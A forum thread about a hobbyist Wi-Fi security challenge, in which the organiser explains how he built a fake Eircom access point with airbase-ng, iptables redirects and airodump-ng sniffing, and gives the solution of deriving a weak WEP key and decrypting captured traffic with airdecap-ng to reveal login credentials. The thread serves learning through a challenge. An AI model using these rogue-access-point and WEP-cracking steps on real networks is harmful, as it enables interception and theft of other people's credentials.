Security Challenge VII

h57xiucj2z946q

Just after finishing up VI and stated that I wouldn't be running any more.. another idea popped into my head:

VII:

http://damo.clanteam.com/sch7/

Usual rules apply.

This one is completely different than the others. Should be fairly trivial for those in the know-how, for others there is a bit to learn :-)

pacquiao

O a scale of 1-10. How hard is this one?

h57xiucj2z946q

About 2-3.

Just need the right tools for the job. Should be straight forward enough.

h57xiucj2z946q

pacquiao wrote: »

O a scale of 1-10. How hard is this one?

If you need a hint, let me know.

pacquiao

I had a look at it.

h57xiucj2z946q

Your on the right track, but maybe edit that spoiler as that is a pretty strong spoiler. You got one piece of info incorrect in it though.

h57xiucj2z946q

heheh that was the strong spoiler I was on about but its slightly incorrect.

pacquiao

is this it

WEP Key: 6C52D55CEFC23E5196A83F9BCD

h57xiucj2z946q

pacquiao wrote: »

is this it

WEP Key: 6C52D55CEFC23E5196A83F9BCD

Also wrong, when its correct you'll know, but you need to know what to do with it when its correct.

pacquiao

I got it. That was really enjoyable. It's very realistic too.
Thanks a lot Damo.

h57xiucj2z946q

Only 3 guys on the hall of fame:

Ack!
pacquiao
emf

Are people stuck ?

h57xiucj2z946q

Jimi Hendrix - third rock from the sun ... wifi

daffy_duc

Hi

h57xiucj2z946q

Well done :-)

syklops

Done. Very good. Also discovered a bug in wireshark while working on it.

The decode wireless traffic appears broken in 1.4.11 on Fedora. I tried using airodecap-ng to see if it made a difference which it did, then I analysed the decrypted traffic with wireshark. Took me a while but once I saw the you know what, I was in with in minutes.

Really good challenge and really life-like as another poster said.

h57xiucj2z946q

skylops:

I think its because aircrack captures wireless frames, while wireshark doesn't. You'll notice wireshark can decode wireless traffic it captures itself.

By the way that other aircrack tool you use was part of the challenge :-)

Putting in a spoiler as its giving away the challenge.

syklops

Tate Limited Rugby wrote: »

skylops:

I think its because aircrack captures wireless frames, while wireshark doesn't. You'll notice wireshark can decode wireless traffic it captures itself.

By the way that other aircrack tool you use was part of the challenge :-)

Putting in a spoiler as its giving away the challenge.

Sorry, i meant to put in a spolier and for some unknown reason I quoted it instead

Have fixed it now. What you said about

wireshark

makes sense.

[-0-]

This was nice Damo. Thanks 900913 for the pointer.

900913

[-0-] wrote: »

This was nice Damo. Thanks 900913 for the pointer.

Damo helped me out alot with this challenge, I knew the key but I didnt know what to do with it. [-0-] now you know how to read encrypted wireless data.
:-)
I love these challenges cause I learn so much from them, and it's in a fun way.

:-)

JimmyCrackCorn

I tried it with the above mentioned tools and it complained about insufficient ISVs. Must give it another go. :rolleyes:

h57xiucj2z946q

make sure you..

use airdecap-ng rather than aircrack-ng.

Kur4mA

I want to start on these challenges too but I am also a total n00b. I not only think these are brilliant, but would love to see it taken further and have them permanently hosted. I'd be willing to contribute to that and am sure others would too. It would be great to start some knowledge sharing too.

h57xiucj2z946q

Just some notes on this challenge. This one was a bit of a tricky one to setup. Putting it in a spoiler in-case some of you want to still do the challenge.

Idea was to have a WiFi spot that has a weak encryption key. In the setup, the WiFi owner would visit the challenge page and log in. Another user (the fictitious character in the prologue of the challenge) sniffs wireless traffic in the air. Little does he know he sniffed encrypted traffic from this WiFi spot, that can actually be decrypted, revealing everything the WiFi owner did, including the credentials he used for the SCHVII hall of fame. Which is the idea of the challenge.

But I didn't have a spare WiFi spot lying around to create this. So I setup a VM on my laptop running some flavor of linux, and used airbase-ng to create a fake WiFi spot from a wireless adapter (edimax ew-7128g) .

So I created a fake eircom WiFi spot that is weak to the old wep generation algo that was exposed some years ago. I have matched the SSID, WEP key and MAC, as if it were a real eircom router.

airbase-ng -e "eircom1234 5670" -a 00:0F:CC:29:C4:74 -c 3 -w 1809d03b82b17d47d8195be596 mon0

Next, we want the person connection to this WiFi spot to actually be able to use the internet, so we gotta setup a tap interface and allow them to be assigned an IP. When they connect to my fake WiFi spot, they will actually be routed through my internet connection via my laptop's built in WiFi adapter (think intel 4965agn). You can look online on how to do this. There is far to much to explain here, but basically what I have executed is:

ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

echo "1" > /proc/sys/net/ipv4/ip_forward
echo > '/var/lib/dhcp3/dhcpd.leases'
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &[/code]


Mean while, on another(!) WiFi adapter (alfa 500mw awus036h) on the linux VM, as the challenge says: the guy in the prologue (me) ran:
airmon-ng start wlan0
airodump-ng -w capture mon0

...which captured all traffic on our fake WiFi spot.

Yet at the same time, on my phone (with all cookies/sessions cleared!), I connected to the fake WiFi spot. Browsed some random pages. Then browsed to the SCHVII page challenge page. Logged into the Hall Of Fame with correct credentials, which would go through our fake WiFi spot in the VM, which in turn would have been captured by our other WiFi adapter sniffing/monitoring traffic, and hence, the challenge was created.

h57xiucj2z946q

Anyone stuck on this one?

h57xiucj2z946q

Solution to this was:

You will notice many of the files reference "eircom1234 5670". You may have decided to use one of the many online generators online to generate a WEP key: 1809d03b82b17d47d8195be596.

Now you can decrypt the wireless packet capture file:
# airdecap-ng -w 1809d03b82b17d47d8195be596 *.cap

View the decrypted file with wireshark.

You will see what use user was doing on the network. You will see an URL he visited and the credentials he used.

jank

Have no idea where you get that WEP key, all the online Generators gave me a key of 07FD5751E32199B641B49FF667 and I tried a few of them so that must mean my original plaintext ascii input is wrong..?

Great challenge though, would love to know if there are more of these out there.

gem600

@jank

use http://www.bacik.org/eircomwep/ to generate the wep key.